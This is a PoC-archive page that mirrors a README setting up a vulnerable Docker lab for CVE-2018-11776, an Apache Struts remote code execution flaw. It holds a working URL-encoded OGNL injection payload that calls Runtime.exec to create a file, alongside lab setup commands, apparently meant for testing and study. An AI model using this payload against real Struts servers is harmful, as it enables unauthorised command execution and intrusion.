Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-11776 PoC — Apache Struts 输入验证错误漏洞

Source
https://github.com/bhdresh/CVE-2018-11776
Associated Vulnerability
Title:Apache Struts 输入验证错误漏洞 (CVE-2018-11776)
Description:Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.
Description
Vulnerable docker container for CVE-2018-11776
Readme
## Vulnerable docker container for CVE-2018-11776

    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

### PoC

##### PoC - 1
   
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
    
##### PoC - 2

    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker
    
    
## Steps to create vulnerable docker container

##### Create a Dockerfile

    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080


##### Build a docker

    # docker build -t cve-2018-11776 .


##### Start a docker

    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash

##### Login to docker

    # docker exec -it cve-2018-11776 /bin/bash

##### Make followinng changes inside docker

###### Set up Tomcat:

    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat

###### Update bashrc with variables:

    # vim ~/.bashrc
    
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    
    # . ~/.bashrc

###### Add an admin to the Tomact gui:

    # vim /opt/tomcat/conf/tomcat-users.xml
    
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />

###### Start Tomcat server

    # $CATALINA_HOME/bin/startup.sh

###### Upload and deploy a vulnerable Struts2 Showcase through tomcat UI

    http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)

###### Restart Tomcat

    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh


###### Add a vulnerable redirection action without a namespace:

    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

      <action name="help">
                  <result type="redirectAction">
                          <param name="actionName">date.action</param>
                  </result>
      </action>

    NOTE: By default, alwaysSelectFullNamespace should be set to True.

###### Restart Tomcat and check out the Struts2 Showcase page:
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

### Author

@bhdresh

### References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057
File Snapshot

 [4.0K]  /data/pocs/09e268759acea479b944a89d5181615dc7b62c0e
└── [3.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →